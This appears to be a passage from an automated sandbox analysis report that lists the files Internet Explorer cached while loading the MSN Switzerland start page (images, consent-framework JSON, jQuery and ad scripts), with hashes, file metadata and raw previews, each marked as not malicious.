Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11755
Entropy (8bit):	7.941987663256228
Encrypted:	false
SSDEEP:	192:BY2mH05wtAqIhwtBVNCR/Fiv35IhYd+WRKZXo3AdN5s3jEZwQBJh7mRnAOktiy/g:eV0qwhGjNC941MRo+Ss9RynAdtV49
MD5:	826FD349B87310B034A956878219BC3D
SHA1:	36BB792D9BC17F319439B98AD8ED08EF22D69898
SHA-256:	8ABD5E1B139E76C18D93308F020E33DD178975070CB5A0F440D06FB3C7B415B6
SHA-512:	DE41E6C4C3327DCD081E19581B2FD43656CB0BC1F3B2ED58B264D9EF8F945AF64F399C9D492E530445416D39346F4624615137F9B7110323B0F4CFDB6C80D70F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d73nC.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=467&y=414
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...7.1..l.x.PK.sO.dwS.s3!...U..V#..y].J....).R.K...LQ.Z1@..1N......S.F(.1F)....qF)....1K.(.....1L....Q@...-.....-......(.11K.\R...;..N....1KE...b...LQ.Z(.....(..S..*...^^..5".\|e.........F.U.........f)E(...S.LQ.\R.@..1N..)..R..\P!....Q..n(.;.....F.K.$...T.J..YQGv8...l..6G..p.i.n[.T..(..Lq.HQ..M^g&9.4....9'.M...7........Xfr.j]..c....)D..W .....d..3.$I.V.P...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1d74my[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	8324
Entropy (8bit):	7.930458790592439
Encrypted:	false
SSDEEP:	192:BFXG5968waGfjF7xwT1GVkmaejmRlORkhXYKlHlECyud2V/V36He5E4+9wn79:v2M8o5CpGJaejmkkhXYKTzyUHe5ENGp
MD5:	8337F8F09943FAFEE445CB2CD44187FE
SHA1:	E1B45C0628067F740DA5271151030A06059962C7
SHA-256:	816A92E63FEDA04BD4F929C382D68280459320AE0ECB1770EC26D9AA55AB34E9
SHA-512:	B22292178E437911DDFBECFBCCFDB0FCE3DFD62468F1029B468AC860413F88D7286C892716F765427D89B51F09B5FFF85BF2BDD7A5022082992C48E035BEB6D0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d74my.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J..Z)(......(...(.....J{y6....A......(.@...[....8Pe.n..}+.Y...k.!]an.......y.6.#".k.[.Fx...Mcm4.b.~.l....A..\......E:.F..u)F.k'?....3i...d.....#......ey.o.<.?.1...6wS...O...Y...?............~+...[..o.H.[.\..$>...5w...4...S.+...E.sN.. f.}.A....qIV,.2.=...j....Z8b..So.K.+...I.c..Y..N.y..$...U..:..t.h6.*W......_.......[)3Kp.!I.z...Uo.K.c.r...T.CW...8.8.i....!B.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1d74ru[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11143
Entropy (8bit):	7.93409339059258
Encrypted:	false
SSDEEP:	192:xY8wL3e3CMZ+dv3O043h1BZbjb8Og3kpbPXAKVntKMoHEsDMNFlhoXx8P:OwSMw+04Tbjakp7wKj4HjUd
MD5:	C3B75DAF4291C35AFD77123D96F5CC8C
SHA1:	50D4C41D941FBFA56A0F78BF64256818B930BF11
SHA-256:	B15DC502A24696502FE9DA67A769938D9912D20F531E6D1610DE02CDA286BD94
SHA-512:	B30AB17304C74CC719D8E1B87E0F124587AB5E85E2615FE05E66355BBC612D600192C75C30C9A038D1BE5AF4ECAF3FAB832D5F0C25C3A5AD498A07304610B171
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d74ru.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..jJ..-IbR.P(.....\|..f..T..r..,hB..}I..Q.\|R....T.`d.6...H.4..Fq.X...2=..L....t........(bX.;sO.Gk.....=O..Y.E..C.....~..D...$##...>....Z...W.~....;..LGuV...j[)..B$......k..$..S.[l.....X'.Q.\|.q...,I!A..f.w.mjT...?...._..q....,Nf...z...Z.-.R.)r=.O.....e...b..v..v..........;=...r.@.j...Z......UF...R..E7.R...qZPD8..0......V.....h.....2...K.......M....J.Z.3.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBJrII1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	348
Entropy (8bit):	6.949202998657417
Encrypted:	false
SSDEEP:	6:6v/lhPkR/W/6TLXThgQPVi39WCOg6lu5fMNGlILQSZV8fMiuYIzbsFkup:6v/78/W/6T7Fg0q9WCn6MMNGSL1ukiua
MD5:	8E1FB6F831EDB003756420A8789619C3
SHA1:	AE3C4E18D5FD2772AE6BF59A6A52BDBB342FDE89
SHA-256:	558462D58A045ACE0C8F05314CF2932C4190ADC328D30BB6B5C4416C9197D858
SHA-512:	D0BB93C0D43F8A4225EC219C4F78028D2F643E1944AAC283FA39DAA1B29E86290D086157FD14DA11A81F404878F45D2BC2FC3AE268E62675345F701D7E6642C9
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBJrII1.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.1/.Q...y.T:I.V$..b0..`.w.#,6..?@...d....BH.P.P..H....?......<.b....W.w...X...Dm...p..k.B.OJ...^....-..HX...osK....{.A....=%........])-.\.h.k.0.......=I..O..M._....M_n.8...P.H......o\.?..}#?..2t8..k.g4.%..o1....T....qo.?....\|j...vd....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBUE92F[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	708
Entropy (8bit):	7.5635226749074205
Encrypted:	false
SSDEEP:	12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
MD5:	770E05618413895818A5CE7582D88CBA
SHA1:	EF83CE65E53166056B644FFC13AF981B64C71617
SHA-256:	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
SHA-512:	B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f......rg.?.....v7.....\.{eE..LB.rq.v.J.:tv...w.....g../.ou.]7........B..{..\|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.\|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....\|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBZbaoj[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	345
Entropy (8bit):	6.7032489389065
Encrypted:	false
SSDEEP:	6:6v/lhPkR/W/6TMm3lOPxUxYa5aoojWFWwoaSSHNVrMTL9opqn+vp:6v/78/W/6TMm30xNaEoo6TSWNVKoK0
MD5:	78BE86D65B6DC7DB0D71CD379A9BC492
SHA1:	1B01C9DB16886EA0E092FB9A35A5F630D2B02806
SHA-256:	62269816D79DAD6C6E726F4F326A68C12A8C885A6F7660822A2614F8030C0641
SHA-512:	EDB389EB371EDCE77FF18B1AAA4CEB605FE445AAFFBAF4BE16116F62EF143DA68A58B61B80F3CDAAE63B7168C0E7DA065E4EE9351C2CC7A1373461D0664ECD71
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8Oc\|.".........X]..o..,...A../..~....!... ..=.<T.&.....P.....?.......d;.0...id..._?1\|...A..}......"(.@.CW......_..Ae...0.f.....x.w:.........1.8........`..,!. P:../......DFn>.N..0f..q...`.e..9.% .-.a.kR.....U....~.....tnd`..:If....(....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBaK3KR[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	551
Entropy (8bit):	7.412246442354541
Encrypted:	false
SSDEEP:	12:6v/78/kF5ij6uepiHibgdj9hUxSzDLpJL8cs3NKH3bnc7z:WO65iHibeBQSvL7S3N03g
MD5:	5928F2F40E8032C27F5D77E3152A8362
SHA1:	22744343D40A5AF7EA9A341E2E98D417B32ABBE9
SHA-256:	5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
SHA-512:	364F9726189A88010317F82A7266A7BB70AA97C85E46D15D245D99C7C97DB69399DC0137F524AE5B754142CCCBD3ACB6070CAFD4EC778DC6E6743332BDA7C7B1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..9,.q..:&.E..#.,B".D.Zll..q,H.......DH..X5.@....P!.#......m?...~C....}......M\.....hb.G=..}.N..b.LYz.b.%.>..}...]..o$..2(.OF_..O./...pxt%...................S.mf..4..p~y...#:2.C......b.........a.M\S.!O.Xi.2.....DC... e7v.$.P[....l..Gc..OD...z..+u...2a%.e.....J.>..s.............]..O..RC....>....&.@.9N.r...p.$..=.d\|fG%&..f...kuy]7....~@eI.R....>.......DX.5.&..,V;.[..W.rQA.z.r.].......%N>\..X.e.n.^&.ij...{.W....T.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	410186
Entropy (8bit):	5.438247175789049
Encrypted:	false
SSDEEP:	3072:pJSJUjxx+9staFqYNswq9l7sopFmp3UqdG+Nm+yYn45HQScV7rt6LX:pJS0O9lHERSmrYn42tu
MD5:	B57020791A104819C084C85EC809610C
SHA1:	1486D88A376A985C07774FE93FD7B81D3202C2C9
SHA-256:	EA1C88D1A432F8DFD684A6C03A3F9FFD093A10D04C5A642340ADC1408176DB77
SHA-512:	3F7719B6DF381BE140003F091EDBE2CE091E9EB5C27E2FA5A958AD8CFDD9E6658625F27F0A65C346A9F6868AE05EDE161B79372BA843A44A8702E50BA95A8BDA
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210116_30554380;a:c67f6319-e19a-4515-a428-59970c243f65;cn:8;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 8, sn: neurope-prod-hp, dt: 2021-01-06T23:25:22.1065409Z, bt: 2021-01-17T01:15:50.5620070Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-01-26 18:42:34Z;axd:;f:msnallexpusers,muidflt13cf,moneyedge3cf,platagyhp1cf,bingcollabhp2cf,onetrustpoplive,anaheim1cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,strsl-spar-noc,weather5cf;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7,"dg":"tmx.pc.ms.ie10plus","ssl":true

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	78451
Entropy (8bit):	5.363992239728574
Encrypted:	false
SSDEEP:	768:hlAyi1IXQu+IE6VyKzxLx1wSICUSk4B1C04JLtJQLNEWE9+CPm7DIUYU5Jfoc:hlLQMFxaACNWit9+Ym7Mkz
MD5:	88AB3FC46E18B4306809589399DA1B04
SHA1:	009F623B8879A08A0BDD08A0266E138C500D52DB
SHA-256:	4D4DF96DDF04BBC6255DFF587A1543B26FC23E0B825DEC33576E61B041C3973A
SHA-512:	B01BB16FA1C04B2734B0B6AEE6B1FAFE914F95B21122D2480E09284B038BD966F831C4AA42C031FE5FC51718E1997F779FC6EBCD428DB943E050F362C10F4B29
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381580
Entropy (8bit):	5.484992669140589
Encrypted:	false
SSDEEP:	6144:4bu9Tw5qIZvbBH0m9Z3GCVvgz56Cu1basFyvrIW:HIZvdP3GCVvg4xVJFUrIW
MD5:	C8A5246D56B3E3EBC492932D0E6701A7
SHA1:	A23FF1FAA764FF411E21166F8AAB967DF410BDAF
SHA-256:	A81B815061A1AF1FBE03063FF5A1381D7298B7E4E0D919FB1C0A025A70C730C5
SHA-512:	45C843E569F26BE3A176FF9F1CF487ABA9AD61FAC168F509AB1EA3765C71365F82040672929027613A4B26279DD13F9D17519B96CCA475A2290413927424AFD2
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381580
Entropy (8bit):	5.485004921043069
Encrypted:	false
SSDEEP:	6144:4bu9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bcsFyvrIW:HIZvdP3GCVvg4xVPFUrIW
MD5:	2DD9FEFF2A6138AD078196AF757735D5
SHA1:	4B94F24A4CB68C4BD0B5EBDE70F6DD8AB8062614
SHA-256:	BA151F86A490C6AD0E7C681FC31822C326D1D9B7710B286D3A29D92F1956DE7E
SHA-512:	A9658BC661502B50D1C57E6970985B5F3DDDE2627392977ADA2D0284F3A2977909F06C1CC2B761C2AFB4DE5AEC47BCB02F8F60F76919EA1196F7EB82DD6CA219
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
